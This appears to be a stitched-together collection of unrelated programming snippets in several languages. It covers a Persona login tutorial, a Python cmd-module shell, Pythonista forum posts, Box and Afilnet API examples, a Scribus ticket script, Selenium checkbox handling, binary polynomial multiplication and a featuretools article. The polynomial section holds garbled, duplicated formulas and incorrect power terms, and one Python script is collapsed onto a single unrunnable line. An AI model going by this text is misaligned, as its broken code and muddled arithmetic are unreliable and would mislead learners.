// 1. Enviar la verificación a tu servidor para verificar y crear la sesión.
// 2. Actualizar la interfaz de usuario.
$.ajax({ /* <-- Este ejemplo utiliza Jquery, pero usar lo que más te guste */
type: 'POST',
url: '/auth/login', // Esta es la URL de tu servidor.
data: {assertion: assertion},
success: function(res, status, xhr) { window.location.reload(); },
error: function(res, status, xhr) { alert("login failure" + res); }
});
},
onlogout: function() {
// Un usuario ha cerrado sesión. Aqui necesitas: // Salir de la sesión redirigiendo al usuario o haciendo una llamada a tu servidor.
$.ajax({
type: 'POST',
url: '/auth/logout', // Esta es la URL de tu servidor.
success: function(res, status, xhr) { window.location.reload(); },
error: function(res, status, xhr) { alert("logout failure" + res); }
});
}
});
En este ejemplo, ambas funciones, onlogin y onlogout, son implementeadas por una petición asíncrona POST al servidor del sitio. El servidor registra la entrada o salida del usuario usualmente ajustando o eliminando información de la cookie de sesión. Entonces, si todo ha sido verificado, la página recargará para acceder al nuevo estado de sesión de la cuenta.
Puedes usar AJAX para implementar esto sin necesidad de recargar o redirigir la página, pero eso queda fuera del alcance de este tutorial.
Tienes que llamar a esta función en cada página con un botón de inicio o cierre de sesión. Para dar soporte a mejoras de Persona, como el inicio de sesión automático y el cierre de sesión global para los usuarios, deberás llamar a esta función en cada página de tu sitio.
En lugar de contraseñas, Persona utiliza "declaraciones de identidad", que son algo así como contraseñas de un solo uso y un solo sitio combinadas con la dirección de correo electrónico del usuario. Cuando un ususario desea iniciar sesión, tu función de retorno onlogin será invocada con una declaración de ese usuario. Antes de que le inicies sesión, debes verificar que la declaración es válida.
Es extremadamente importante que verifiques la declaración en tu servidor, y no en el código JavaScript ejecutándose en el navegador del usuario, debido a que podría ser fácil de falsificar. El ejemplo de arriba envió la declaración al servidor del sitio utilizando la función $.ajax() de jQuery para hacer POST en /api/login.
Una vez que tu servidor tiene la declaración, ¿cómo la verificas? La manera más fácil es utilizando un servicio de ayuda provisto por Mozilla. Simplemente envía una solicitud POST a https://verifier.login.persona.org/verify con dos parámetros:
assertion: La declaración de identidad provista por el usuario.
audience: El nombre y puerto de tu sitio. Debes establecer rígidamente este valor en tu código de servidor; no lo derives de ningún dato suministrado por el usuario.
Por ejemplo, si eres example.com, puedes utilizar la línea de comandos para probar una declaración con:
$ curl -d "assertion=<ASSERTION>&audience=https://example.com:443" "https://verifier.login.persona.org/verify"
Si es válida, obtendrás una respuesta JSON como la siguiente:
{
"status": "okay",
"email": "bob@eyedee.me",
"audience": "https://example.com:443",
"expires": 1308859352261,
"issuer": "eyedee.me"
}
Puedes aprender mas acerca del servicio de verificación leyendo La API del Servicio de Verificación. Un ejemplo la implementación de /api/login, utilizando Python, el framework web Flask, y la librería Requests HTTP se vería así:
@app.route('/api/login', methods=['POST'])
def login():
# The request has to have an assertion for us to verify
if 'assertion' not in request.form:
abort(400)
# Send the assertion to Mozilla's verifier service.
data = {'assertion': request.form['assertion'], 'audience': 'https://example.com:443'}
resp = requests.post('https://verifier.login.persona.org/verify', data=data)
# Did the verifier respond?
if resp.ok:
# Parse the response
verification_data = json.loads(resp.content)
# Check if the assertion was valid
if verification_data['status'] == 'okay':
# Log the user in by setting a secure session cookie
session.update({'email': verification_data['email']})
return resp.content
# Oops, something failed. Abort.
abort(500)
El manejo de sesiones es probablemente muy similar a tu sistema actual de login. El primer gran cambio está en la verificación de la identidad del usuario revisando una aserción en vez de revisar un password. El otro gran cambio es asegurarse que la dirección de email del usuario está disponible para usarse en el parametro loggedInEmail para navigator.id.watch().
El Logout es simple: Solo necesitas remover la cookie de la sesión del usuario.
Una vez que todo funciona y has logrado iniciar y cerrar sesion satisfactoriamente en tu sitio, debes de tomarte un momento para revisar las mejores prácticas para usar Persona de forma segura.
Si estás haciendo un sitio listo para producción, tal vez quieras hacer pruebas de integración que simulan un usuario entrando y saliendo de tu sitio utilizando BrowserID. Para facilitar esta acción en Selenium, considera la librería bidpom. Los sitios mockmyid.com y personatestuser.org también son útiles.
Por último, no olvides enrolarte en la lista de correos de Noticias de Persona para que seas notificado de cualquier problema de seguridad o cambios de incopatibilidad con versiones anteriores de la API de persona. La lista es extremadamente de poco tráfico: es solo utilizada para anunciar cambios que pueden impactar en tu sitio.
|
0x00 关于cmd模块
使用cmd模块创建的命令行解释器可以循环读取输入的所有行并且解析它们
0x01 cmd模块的一些常用方法:
cmdloop():类似与Tkinter的mainloop,运行Cmd解析器
onecmd(str):读取输入,并进行处理,通常不需要重载该函数,而是使用更加具体的do_command来执行特定的命名
emptyline():当输入空行时调用该方法
default(line):当无法识别输入的command时调用该方法
completedefault(text,line,begidx,endidx):如果不存在针对的complete_*()方法,那么会调用该函数
precmd(line):命令line解析之前被调用该方法
postcmd(stop,line):命令line解析之后被调用该方法
preloop():cmdloop()运行之前调用该方法
postloop():cmdloop()退出之后调用该方法
0x02 用cmd模块简单实现shell命令
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys
import os
import socket
from cmd import Cmd
class ClassShell(Cmd):
"""docstring for ClassShell"""
def __init__(self):
Cmd.__init__(self)
os.chdir("C:/Users/WYB_9/Desktop")
hostName = socket.gethostname()
self.prompt = "reber@" + hostName + " " + os.path.abspath('.') + "\n$ "
def help_dir(self):
print "dir [path]"
def do_dir(self, arg):
if not arg:
print "\n".join(os.listdir('.'))
elif os.path.exists(arg):
print "\n".join(os.listdir(arg))
else:
print "no such path exists"
def help_ls(self):
print "ls [path]"
def do_ls(self, arg):
if not arg:
print "\n".join(os.listdir('.'))
elif os.path.exists(arg):
print "\n".join(os.listdir(arg))
else:
print "no such path exists"
def help_pwd(self):
print "pwd"
def do_pwd(self, arg):
print os.path.abspath('.')
def help_cd(self):
print "cd [path]"
def do_cd(self, arg):
hostName = socket.gethostname()
if not arg:
os.chdir("C:/Users/WYB_9/Desktop")
self.prompt = "reber@" + hostName + " " + os.path.abspath('.') + "\n$ "
elif os.path.exists(arg):
os.chdir(arg)
self.prompt = "reber@" + hostName + " " + os.path.abspath('.') + "\n$ "
else:
print "no such path"
def help_clear(self):
print "clear"
def do_clear(self, arg):
i = os.system('cls')
def help_cat(self):
print "cat filename"
def do_cat(self, arg):
if os.path.exists(arg):
with open(arg,"r") as f:
data = f.read()
print data
else:
print "no such file exists"
def help_mv(self):
print "mv oldfilename newfilename"
def do_mv(self, arg):
oldfilename,newfilename = arg.split()
if os.path.exists(oldfilename):
os.rename(oldfilename,newfilename)
else:
print "no such file:" + oldfilename
def help_touch(self):
print "touch filename"
def do_touch(self, arg):
with open(arg, "w") as f:
pass
def help_rm(self):
print "rm filepath"
def do_rm(self, arg):
if os.path.exists(arg):
os.remove(arg)
else:
print "no such file:" + arg
def help_cp(self):
print "cp oldfilepath newfilepath"
def do_cp(self, arg):
oldfilepath,newfilepath = arg.split()
if os.path.exists(oldfilepath):
with open(oldfilepath, "r") as f:
data = f.read()
with open(newfilepath, "w") as f:
f.write(data)
else:
print "no such path:" + oldfilepath
def help_exit(self):
print "input exit will exit the program"
def do_exit(self, arg):
print "Exit:",arg
sys.exit()
if __name__ == '__main__':
shell = ClassShell()
shell.cmdloop()
|
Ro
Recently I had a great idea that would allow Pythonista users to be able to use colorama (or other color markup) in their programs rather than using console functions!
How it would work
The program would run in the background as a thread and would intercept new stdout messages! Rather then being printed, the program would parse the message and check for color tags (eg. \033[44m)! If the program detects a color tag it could then change the color of the corrisponding text at the segment of the tag
[1]!
With this: more PC python programs that can run on pythonista and use in-line color tags!!!
# [1] Example
...
if r"\033" in message: # check for \033 colors
color = parse_colors(message) # needed function
sys.stdout.write(text_before_colorized)
if color == "[44": # parsing
console.set_color(0,0,1)
sys.stdout.write(text_after_colorized)
sys.stdout.write("\n") # ending print
...
# There are many flaws with this example code but it shows the basic idea of how some of it would work!
# ToDo: Parse multiple color codes in string
# ToDo: Ignore r"messages"
# ToDo: Ignore non-strings
# ToDo: Make thread immune to KeyboardInturrupt
# ToDo: Add kill method to thread
# ToDo: Support multiple color markups
# Error: >>> print "message",
# would not remove the "\n" are parsing
# End Result:
# >>> print "normal color \033[44m blue color"
# normal color blue color
# ^ ^ this would be blue
I wanted to share this idea with the community because I can't find time to make it and rather than just let the good idea die: I would like to share it with people who may be intrested in using it!
Ro
A deadly error has occurred while I was using the latest version of Pythonista 3 on an iPhone 6 using iOS 11.2.2! After creating a md file called â127.0.0.2.mdâ with âos.mkfifoâ and opening the file, I was unable to edit anything in the file; then everything froze and the app crashed. But now, every time I open the app, Pythonista 3 shows the logo and crashes. Iâve tried holding power & home to do a reset which didnât work; Iâve tried doing a shutdown which did let me do some things, but if I try to look at other files or change the file name, it will crash; and I have tried using the shortcut âpythonista3://â but that also results in a crash.
This deeply worries me because I was working on a huge project and now the app is not going to function.
Update: This affects more then just Pythonista, it also kills your keyboard and you cant get your keyboard to pop up in certain apps.
Here is the error log from my device: https://ghostbin.com/paste/oyf27
Update: Pythonista 3 has a safe mode which fixed everything! THANK F*CKING GOD THATS A FEATURE! I would have cried if that didnât exist
Ro
I found a working DLNA Controller & Server that can run on Pythonista: https://github.com/cherezov/dlnap/blob/master/dlnap/dlnap.py
|
.upper(), .lower(), and .title() all are performed on an existing string and produce a string in return. Let’s take a look at a string method that returns a different object entirely!
.split() is performed on a string, takes one argument, and returns a list of substrings found between the given argument (which in the case of .split() is known as the delimiter). The following syntax should be used:
string_name.split(delimiter)
If you do not provide an argument for .split() it will default to splitting at spaces.
For example, consider the following strings:
man_its_a_hot_one = "Like seven inches from the midday sun"
print(man_its_a_hot_one.split())
# => ['Like', 'seven', 'inches', 'from', 'the', 'midday', 'sun']
.split returned a list with each word in the string. Important to note: if we run .split() on a string with no spaces, we will get the same string in return.
Instructions
1.
In the code editor is a string of the first line of the poem Spring Storm by William Carlos Williams.
Use .split() to create a list called line_one_words that contains each word in this line of poetry.
|
指定したファイルのすべてのメタデータを取得します。
12345
ファイルを表す一意の識別子。
ファイルIDを確認するには、ウェブアプリケーションでファイルにアクセスして、URLからIDをコピーします。たとえば、URLがhttps://*.app.box.com/files/123の場合、file_idは123です。
curl -i -X GET "https://api.box.com/2.0/files/12345/metadata" \
-H "Authorization: Bearer <ACCESS_TOKEN>"
BoxMetadataTemplateCollection<Dictionary<string, object>> metadataInstances = await client.MetadataManager
.GetAllFileMetadataTemplatesAsync(fileId: "11111");
BoxFile file = new BoxFile(api, "id");
Iterable<Metadata> metadataList = file.getAllMetadata();
for (Metadata metadata : metadataList) {
// Do something with the metadata.
}
file_metadata = client.file(file_id='11111').get_all_metadata()
for instance in file_metadata:
if 'foo' in instance:
print('Metadata instance {0} has value "{1}" for foo'.format(instance['id'], instance['foo']))
client.files.getAllMetadata('11111')
.then(metadata => {
/* metadata -> {
entries:
[ { currentDocumentStage: 'Init',
'$type': 'documentFlow-452b4c9d-c3ad-4ac7-b1ad-9d5192f2fc5f',
'$parent': 'file_11111',
'$id': '50ba0dba-0f89-4395-b867-3e057c1f6ed9',
'$version': 4,
'$typeVersion': 2,
needsApprovalFrom: 'Smith',
'$template': 'documentFlow',
'$scope': 'enterprise_12345' },
{ '$type': 'productInfo-9d7b6993-b09e-4e52-b197-e42f0ea995b9',
'$parent': 'file_11111',
'$id': '15d1014a-06c2-47ad-9916-014eab456194',
'$version': 2,
'$typeVersion': 1,
skuNumber: 45334223,
description: 'Watch',
'$template': 'productInfo',
'$scope': 'enterprise_12345' },
{ Popularity: '25',
'$type': 'properties',
'$parent': 'file_11111',
'$id': 'b6f36cbc-fc7a-4eda-8889-130f350cc057',
'$version': 0,
'$typeVersion': 2,
'$template': 'properties',
'$scope': 'global' } ],
limit: 100 }
*/
});
client.metadata.list(forFileId: "11111") { (result: Result<[MetadataObject], BoxSDKError>) in
guard case let .success(metadata) = result {
print("Error retrieving metadata")
return
}
print("Retrieved \(metadata.count) metadata instances:")
for instance in metadata {
print("- \(instance.template)")
}
}
{
"entries": [
{
"$parent": "folder_59449484661,",
"$template": "marketingCollateral",
"$scope": "enterprise_27335",
"$version": 1
}
],
"limit": 100
}
|
Saatke massmeilisõnumeid mallilt Python
Saatke hulgimeili aadressirühmale, kasutades malli koos Python
Looge grupp Python abil
Hankige grupiväljade loend Python abil
Lisage väli väljale Python
Välja kustutamine grupist Python
Kontakti kustutamine grupist
Riigi omistamine grupile, kus on Python
Hankige grupi kontaktiloend Python abil
Lisage kontakt Python -ga gruppi
Muutke rühma kontakti Python abil
Kustutage Python -ga grupi kontakt
Hankige loend aktiivsete vestluskanalite kohta keelega Python
Saada sõnum vestlusega kasutajaga Python
Faili saatmine vestlusega kasutajaga Python
Hankige vestluste loend vestlusega, mille kasutaja on Python
Hankige sõnumite loend vestlusega, mille kasutaja on Python
Hankige loend lugemata sõnumitest vestlusega, mille kasutaja on Python
Saatke massmeilisõnumeid mallilt Python
import urllib2
afilnet_class="email"
afilnet_method="sendemailtogroupfromtemplate"
afilnet_user="user"
afilnet_password="password"
afilnet_idgroup="1000"
afilnet_idtemplate="1000"
afilnet_scheduledatetime=""
afilnet_output=""
# Create an URL request
sUrl = "https://www.afilnet.com/api/http/?class="+afilnet_class+"&method="+afilnet_method+"&user="+afilnet_user+"&password="+afilnet_password+"&idgroup="+afilnet_idgroup+"&idtemplate="+afilnet_idtemplate+"&scheduledatetime="+afilnet_scheduledatetime+"&output="+afilnet_output
result = urllib2.urlopen(sUrl).read()
from urllib.request import urlopen
from urllib.parse import urlencode
afilnet_class="email"
afilnet_method="sendemailtogroupfromtemplate"
afilnet_user="user"
afilnet_password="password"
afilnet_idgroup="1000"
afilnet_idtemplate="1000"
afilnet_scheduledatetime=""
afilnet_output=""
# Create an URL request
sUrl = "https://www.afilnet.com/api/http/"
data = urlencode({"class": afilnet_class,"method": afilnet_method,"user": afilnet_user,"password": afilnet_password,"idgroup": afilnet_idgroup,"idtemplate": afilnet_idtemplate,"scheduledatetime": afilnet_scheduledatetime,"output": afilnet_output}).encode("utf-8")
result = urlopen(sUrl, data).read()
print(result)
import requests
afilnet_class="email"
afilnet_method="sendemailtogroupfromtemplate"
afilnet_user="user"
afilnet_password="password"
afilnet_idgroup="1000"
afilnet_idtemplate="1000"
afilnet_scheduledatetime=""
afilnet_output=""
# Create an URL request
sUrl = "https://www.afilnet.com/api/basic/?class="+afilnet_class+"&method="+afilnet_method+"&idgroup="+afilnet_idgroup+"&idtemplate="+afilnet_idtemplate+"&scheduledatetime="+afilnet_scheduledatetime+"&output="+afilnet_output
result = requests.get(sUrl,auth=requests.auth.HTTPBasicAuth(afilnet_user,afilnet_password))
print(result.text)
Parameeter Kirjeldus Kohustuslik / valikuline
class=email Taotletud klass: klass, millele taotlus esitatakse Kohustuslik
method=sendemailtogroupfromtemplate Taotletud klassimeetod: selle klassi meetod, millele taotlus esitatakse Kohustuslik
user Teie Afilneti konto kasutaja ja e-post Kohustuslik
password Teie Afilneti konto parool Kohustuslik
idgroup Sihtgrupi identifikaator Kohustuslik
idtemplate email.sendemailtogroupfromtemplate_idtemplate Kohustuslik
scheduledatetime Tarne kuupäev ja kellaaeg aaaa-kk-pp hh:mm:ss formaadis Valikuline
output Tulemuse väljundvorming Valikuline
Taotluste esitamisel kuvatakse järgmised väljad:
status
tulemus (kui olek = edu), saate siin järgmised väärtused:
id
count
credits
destinations
messageid
destination
tõrge (kui olek = tõrge), saate siin veakoodi
Võimalikud veakoodid on loetletud allpool
Kood Kirjeldus
MISSING_USER Kasutajat või e-posti pole lisatud
MISSING_PASSWORD Parool ei kuulu komplekti
MISSING_CLASS Klassi ei kuulu
MISSING_METHOD Meetod ei kuulu komplekti
MISSING_COMPULSORY_PARAM Kohustuslik parameeter ei kuulu komplekti
INCORRECT_USER_PASSWORD Vale kasutaja või parool
INCORRECT_CLASS Vale klass
INCORRECT_METHOD Vale meetod
NOT_ACCESS_TO_GROUP Teile ei lubata määratud rühma
NO_CREDITS Teie tasakaal on ebapiisav
Parameetrid:
class: email
method: sendemailtogroupfromtemplate
user: user
password: password
idgroup: 1000
idtemplate: 1000
scheduledatetime:
output:
Taotlus:
https://www.afilnet.com/api/http/?class=email&method=sendemailtogroupfromtemplate&user=user&password=password&idgroup=1000&idtemplate=1000&scheduledatetime=&output=
|
Demo:bilibili
Using:Python 3.5,ffmpeg-bin
Dependence:PIL,string,numpy,math
务必注意这只是Prototype,性能可以说是完全没有的
首先截取画面 命令行下
ffmpeg -ss TIME -t DURING -i INPUT -frames:v TOTAL OUTPUT
TIME:开始截取的时间
DURING:截取时长
INPUT:视频文件名
TOTAL:截取帧数
OUTPUT:输出的图片名(例如pic%d.png,将生成pic1.png,pic2.png,…)
接着Python
from PIL import Image,ImageDraw,ImageFont import string import numpy import math FontSize=24 font = ImageFont.truetype('consola.ttf',FontSize) FontPxSize=font.getsize('A') LetterLuma={} LetterUsed="qwertyuiopasdfghjklzxcvbnm[];',.{}:\"<>?~!@#$%^&*()_+-=123456789/" #允许使用的字符 for letter in LetterUsed: imgl=Image.new('RGB',FontPxSize,(255,255,255)) drawl=ImageDraw.Draw(imgl) drawl.text((0,0),letter,(0,0,0),font=font) dat=list(imgl.getdata()) ave=numpy.average(dat) LetterLuma[letter]=ave LetterLuma[' ']=255 LowID=1 #图片开始的序号 HighID=2 #图片结束的序号+1 IDafx='k' #图片编号前缀 fload='' #图片位置 QuickGuess={} for id in range(LowID,HighID): filename=fload+IDafx+str(id)+'.png' #假设图片为png格式 img=Image.open(filename) img.load() img=img.convert("L") imgsize=img.size maxrow=math.floor(imgsize[1]/FontPxSize[1]) maxcol=math.floor(imgsize[0]/FontPxSize[0]) linesize=imgsize[1] pxwidth=FontPxSize[0] pxheight=FontPxSize[1] outputimg=Image.new('RGB',(maxcol*FontPxSize[0],maxrow*FontPxSize[1]),(255,255,255)) outputdraw=ImageDraw.Draw(outputimg) for h in range(0,maxrow): RanderText='' TextCache=[] for w in range(0,maxcol): ''' 开始计算平均灰度 ''' l=0.0 l=numpy.average(list((img.getpixel((x,y)) for x in range(w*pxwidth,(w+1)*pxwidth) for y in range(h*pxheight,(h+1)*pxheight)))) '''l/=FontPxSize[0]*FontPxSize[1]''' bestguess=' ' if (QuickGuess.get(int(l))==None): for key in LetterLuma: if (abs(LetterLuma[bestguess]-l)>abs(LetterLuma[key]-l)): bestguess=key QuickGuess[int(l)]=bestguess else: bestguess=QuickGuess[int(l)] TextCache.append(bestguess) RanderText=RanderText.join(TextCache) outputdraw.text((0,h*pxheight), RanderText,(0,0,0),font=font) outputimg.save(fload+IDafx+'MOD'+str(id)+'.png') img.close()
最后再用ffmpeg合成 命令行下
ffmpeg -framerate FRAMERATE -i PICINPUT -codec copy FILMOUTPUT
FRAMERATE:帧率
PICINPUT:图片
copy:指定的视频压缩格式为仅复制(可换成h264)
FILMOUTPUT:输出视频
为了快速开发所以没有用getdata方法把数据导出list再计算平均灰度考虑对齐问题好烦啊这是性能瓶颈之一,因为getpixel方法比average方法的CPU耗时多另外一个可能瓶颈在于硬盘IO,数据从硬盘流到内存(ffmpeg解码)再流回硬盘(保存为png)再流到内存(解码png)再流到硬盘(保存为png)再流到内存(ffmpeg编码)再流到硬盘(保存为视频),鉴于不知道有没有Python上包装ffmpeg的库,可以用C写两个函数,然后黏到Python上。
Demo在8核3.2GHz的处理器上,ffmpeg截图约50 fps,Python处理(多进程)约1 fps,ffmpeg合成约300 fps
|
Dieses Skript erzeugt nummerierte Karten, z.B. Eintrittskarten. Der Code (befindet sich neben Beispieldaten auch im Anhang):
Code: Alles auswählen
#!/usr/bin/env Python
# -*- coding: utf-8 -*-
import scribus
#################################
# Einstellungen:
# Anzahl an Karten:
anzahl = 48
# Anzahl der Karten pro Seite:
anzahl_pro_seite = 16
# Anzahl der Spalten:
spalten = 2
# Versatz der rechten Karte von der linken, bzw. von der unteren zur Oberen
abstand_x = 90.89
abstand_y = 33.5975
# Absatzstile für die Textbox mit der Nummer:
stil = "Nummer"
# Musterseite mit dem Layout der Karte:
musterseite = "Karten"
##################################
# Beginn Skript:
# Informationen über das Textfeld beschaffen:
x,y = scribus.getPosition()
breite, hoehe = scribus.getSize()
zaehler = int(scribus.getText())
anzahl_stellen = len(scribus.getText())
# Verschiedene Variablen festlegen...
anzahl_pro_spalte = anzahl_pro_seite / spalten
x_neu = x
y_neu = y + abstand_y
zaehler_seite = 0
zaehler_spalte = 1
while zaehler != anzahl:
while zaehler_seite < anzahl_pro_seite:
while zaehler_spalte < anzahl_pro_spalte:
zaehler = zaehler + 1
zaehler_spalte = zaehler_spalte + 1
rahmen = scribus.createText(x_neu, y_neu, breite, hoehe)
scribus.setText(str(zaehler).zfill(anzahl_stellen), rahmen)
scribus.setStyle(stil, rahmen)
y_neu = y_neu + abstand_y
if zaehler == anzahl:
break
if zaehler == anzahl:
break
x_neu = x_neu + abstand_x
y_neu = y
zaehler_seite = zaehler_seite + zaehler_spalte
zaehler_spalte = 0
if zaehler < anzahl:
zaehler_seite = 0
zaehler_spalte = 0
scribus.newPage(-1, musterseite)
scribus.gotoPage(scribus.pageCount())
y_neu = y
x_neu = x
Dokument anlegen: Stil für die Nummer namens „Nummer“ und eine Musterseite mit dem Namen „Karten“ (Namen können im Skript geändert werden)
Skript anpassen: Im ersten Abschnitt die Variablen auf die gewünschten Werte setzen
Skript ausführen: Den ersten Textrahmen mit der gewünschten Anfangsnummer und der gewünschten Anzahl an Stellen auffüllen, z.B.00023und diesen markieren (wichtig!), dann erst das Skript ausführen.
Das Dokument speichern, exportieren, drucken und (am besten mit einer Schneidevorrichtung) zuschneiden ;-)
Fenster) auf gleichen vertikalen / horizontalen Abstand bringen (In der angezeigten Warnung gesperrte Objekte ignorieren auswählen)
Lizenz:
Gruß
Julius
|
更多关于python selenium的文章,请关注我的专栏:
Python Selenium自动化测试详解
网页上有时候遇到checkbox和radio,一般情况下这两种都是input标签,我们可以通过点击或者发送空格的方式进行选中
试验网页代码checkandradio.html:
<html><body>Checkbox:<input type="checkbox" value="cv1" name="c1"><input type="checkbox" value="cv2"><input type="checkbox" value="cv3" name="c1"><input type="checkbox" value="cv4"><p>Radio:<input type="radio" value="rv1" name="r1"><input type="radio" value="rv2" name="r1"></body></html>
定位:就是普通的input标签,按照正常的定位方式定位就可以,不再赘述。
下面我们用selenium选中其中的checkbox(1、2)和radio1->radio2,上代码:
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep
driver = webdriver.Firefox()
driver.maximize_window()
driver.get('file:///D:/checkboxandradio.html')
# checkbox
driver.find_element_by_xpath('//input[@value="cv1"]').click() # click
driver.find_element_by_xpath('//input[@value="cv2"]').send_keys(Keys.SPACE) # send space
# radio
driver.find_element_by_xpath('//input[@value="rv1"]').send_keys(Keys.SPACE) # send space
sleep(1)
driver.find_element_by_xpath('//input[@value="rv2"]').click() # click
sleep(1)
driver.quit()
从上例可以看出我们对这种checkbox和radio,可以通过直接点击或者发送空格的方式达到选中或者反选的目的。
检查某个框是否被选中
element.is_selected()
示例代码如下:
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep
driver = webdriver.Firefox()
driver.maximize_window()
driver.get('file:///D:/checkboxandradio.html')
# checkbox
driver.find_element_by_xpath('//input[@value="cv1"]').click() # click
driver.find_element_by_xpath('//input[@value="cv2"]').send_keys(Keys.SPACE) # send space
if driver.find_element_by_xpath('//input[@value="cv2"]').is_selected():
print 'selected!'
else:
print 'not yet!'
# radio
driver.find_element_by_xpath('//input[@value="rv1"]').send_keys(Keys.SPACE) # send space
sleep(1)
driver.find_element_by_xpath('//input[@value="rv2"]').click() # click
if driver.find_element_by_xpath('//input[@value="rv1"]').is_selected():
print 'selected!'
else:
print 'not yet!'
sleep(1)
driver.quit()
结果:
selected!not yet!
当然,选中和判断是否选中还有其他的方法,如模拟鼠标点击、用js选中、修改标签属性选中;用js、jQuery判断是否选中、用标签属性判断是否选中,不过针对大部分情况,以上方法足够用了。如果以上方法失效,可以考虑直接修改或获取标签属性,或者可能是其他因素如等待时间、页面遮挡等导致无法选中,可进行更多尝试。
|
Solution:
In case it is a function, it requires to return something. Else, running it is kind of useless.
So you possibly require to say:
def multiply(a, b):
return a * b
You possibly want to read more about functions in Python and at the time this would make sense (passing by reference, for example). This can be a good starting point: Python functions.
There is no return value, the code will be OK
def multiply(a, b):
return a * b
For example 111 x 101 gives:
111
x101
------
111
000
111
-----
11011
=====
We can illustrate 101 as x2+1x2+1 and 110 as x2+xx2+x
In next move we multiple them together to give:
(x2+1)×(x2+x)(x2+1)×(x2+x)
(x4+x3+x2+x)(x4+x3+x2+x)
which can be illustrated as 11110
For example in case we exercise the example on Page 6 [here] of 84 x 13 (and where ** represents "to the power of")
84x13 = ((2**6+ 2**4+ 2**2)x(2**3+ 2**2+ 2**0)) (mod 2)
= (2**9+ 2**8+ 2**7+2**1+ 2**6+ 2**5+ 2**1 + 2**4+ 2**2) (mod 2)
= (2**9+ 2**8+ 2**7+ 2**5+ 2**2) (mod 2)
which is 1110100100 [Calc]
The performing out in its proper form is:
84x13 = ((26+24+22)×(23+22+20))(mod2)
=(29+28+26+27+26+24+25+24+22)(mod2)
=(29+28+27+25+22)(mod2)
I have exercise a simple bit-shift operation and X-OR to implement the method:
import struct
import sys
val1=1
val2=1
if (len(sys.argv)>1):
val1=str(sys.argv[1])
if (len(sys.argv)>2):
val2=str(sys.argv[2])
def reverse(text):
lst = []
count = 1
for i in range(0,len(text)):
lst.append(text[len(text)-count])
count += 1
lst = ''.join(lst)
return lst
def showpoly(a):
str1 = ""
nobits = len(a)
for x in range (0,nobits-2):
if (a[x] == '1'):
if (len(str1)==0):
str1 +="x**"+str(nobits-x-1)
else:
str1 +="+x**"+str(nobits-x-1)
if (a[nobits-2] == '1'):
if (len(str1)==0):
str1 +="x"
else:
str1 +="+x"
if (a[nobits-1] == '1'):
str1 +="+1"
print str1;
def multiply(a,b):
bit1 = int(a,2)
bit2 = int(b,2)
g = []
nobits = len(b)
print a.rjust(len(a)+len(b)-1)
str = "x"+b;
print str.rjust(len(a)+len(b)-1)
print "-" * (len(a)+len(b)-1)
b=reverse(b)
for i in range (0,nobits):
if (b[i]=='0'):
g.append(0)
else:
g.append(int((bit1<<i)))
print bin(g[i])[2:].rjust(len(a)+len(b)-1)
res=int(g[0])
for i in range (1,nobits):
res = int(res) ^ int(g[i])
print "-" * (len(a)+len(b)-1)
print bin(res)[2:].zfill(len(a)+len(b)-1)
print "=" * (len(a)+len(b)-1)
return res
print "Binary form:\t",val1,"x",val2
print "Decimal form:\t",int(val1,2),"x",int(val2,2)
print ""
showpoly(val1)
showpoly(val2)
print "\nWorking out:\n"
res=multiply(val1,val2)
print "\nResult: ",res
|
机器学习的模型训练越来越自动化,但特征工程还是一个漫长的手动过程,依赖于专业的领域知识,直觉和数据处理。而特征选取恰恰是机器学习重要的先期步骤,虽然不如模型训练那样能产生直接可用的结果。本文作者将使用Python的featuretools库进行自动化特征工程的示例。
机器学习越来越多地从手动设计模型转变为使用H20,TPOT和auto-sklearn等工具来自动优化的渠道。这些库以及随机搜索等方法旨在通过查找数据集的最优模型来简化模型选择和转变机器学习的部分,几乎不需要人工干预。然而,特征工程几乎完全是人工,这无疑是机器学习管道中更有价值的方面。
特征工程也称为特征创建,是从现有数据构建新特征以训练机器学习模型的过程。这个步骤可能比实际应用的模型更重要,因为机器学习算法只从我们提供的数据中学习,然而创建与任务相关的特征绝对是至关重要的。
通常,特征工程是一个漫长的手动过程,依赖于专业的领域知识,直觉和数据处理。这个过程可能非常繁琐,而且最终的特征将受到人类主观性和时间的限制。自动化特征工程旨在通过从数据集中自动创建许多候选特征来帮助数据科学家,并从中可以选择最佳特征用于训练。
在本文中,我们将使用Python 的featuretools库进行自动化特征工程的示例。我们将使用示例数据集来演示基础知识。
完整代码:
https://github.com/WillKoehrsen/automated-feature-engineering/blob/master/walk_through/Automated_Feature_Engineering.ipynb
特征工程基础
特征工程意味着从现有数据中构建额外特征,这些数据通常分布在多个相关表中。特征工程需要从数据中提取相关信息并将其放入单个表中,然后可以使用该表来训练机器学习模型。
构建特征的过程非常地耗时,因为每个特征的构建通常需要一些步骤来实现,尤其是使用多个表中的信息时。我们可以将特征创建的步骤分为两类:转换和聚合。让我们看几个例子来了解这些概念的实际应用。
转换作用于单个表(从Python角度来看,表只是一个Pandas 数据框),它通过一个或多个现有的列创建新特征。
例如,如果我们有如下客户表。
我们可以通过查找joined列的月份或是获取income列的自然对数来创建特征。这些都是转换,因为它们仅使用来自一个表的信息。
import pandas as pd
# Group loans by client id and calculate mean, max, min of loans
stats = loans.groupby('client_id')['loan_amount'].agg(['mean', 'max', 'min'])
stats.columns = ['mean_loan_amount', 'max_loan_amount', 'min_loan_amount']
# Merge with the clients dataframe
stats = clients.merge(stats, left_on = 'client_id', right_index=True, how = 'left')
stats.head(10)
另一方面,聚合作用于多个表,并使用一对多的关系对观测值进行分组,然后计算统计数据。例如,如果我们有另一个包含客户贷款的信息表格,其中每个客户可能有多笔贷款,我们可以计算每个客户的贷款的平均值,最大值和最小值等统计数据。
此过程包括通过客户信息对贷款表进行分组,计算聚合,然后将结果数据合并到客户数据中。以下是我们如何使用Pandas库在Python中执行此操作。
这些操作本身并不困难,但如果我们有数百个变量分布在几十个表中,那么这个过程要通过手工完成是不可行的。理想情况下,我们需要一种能够跨多个表自动执行转换和聚合的解决方案,并将结果数据合并到一个表中。尽管Pandas库是一个很好的资源,但通过我们手工完成的数据操作是有限的。
手动特征工程的更多信息:
https://jakevdp.github.io/PythonDataScienceHandbook/05.04-feature-engineering.html
Featuretools
幸运的是,featuretools正是我们正在寻找的解决方案。这个开源Python库将自动从一组相关表中创建许多特征。Featuretools基于一种称为“深度特征合成”的方法,这个名字听起来比实际的用途更令人印象深刻
